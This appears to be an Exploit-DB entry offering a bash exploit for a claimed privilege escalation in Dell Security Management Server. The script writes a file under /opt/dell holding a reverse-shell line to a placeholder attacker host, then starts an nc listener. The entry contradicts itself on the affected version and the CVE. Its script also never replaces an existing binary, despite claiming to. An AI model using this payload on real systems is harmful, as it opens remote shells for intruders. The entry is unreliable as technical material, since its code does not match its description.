Dell Security Management Server <1.9.0 - Local Privilege Escalation

EDB-ID:

51934

CVE:

N/A




Platform:

Linux

Date:

2024-03-28


# Exploit Title: [title] Dell Security Management Server versions prior to
11.9.0
# Exploit Author: [author] Amirhossein Bahramizadeh
# CVE : [if applicable] CVE-2023-32479
Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security
Management
Server versions prior to 11.9.0 contain privilege escalation vulnerability
due to improper ACL of the non-default installation directory. A local
malicious user could potentially exploit this vulnerability by replacing
binaries in installed directory and taking the reverse shell of the system
leading to Privilege Escalation.

#!/bin/bash

INSTALL_DIR="/opt/dell"

# Check if the installed directory has improper ACLs
if [ -w "$INSTALL_DIR" ]; then
    # Replace a binary in the installed directory with a malicious binary that opens a reverse shell
    echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"
    echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"
    chmod +x "$INSTALL_DIR/dell-exploit"

    # Wait for the reverse shell to connect to your malicious server
    nc -lvnp 1234
fi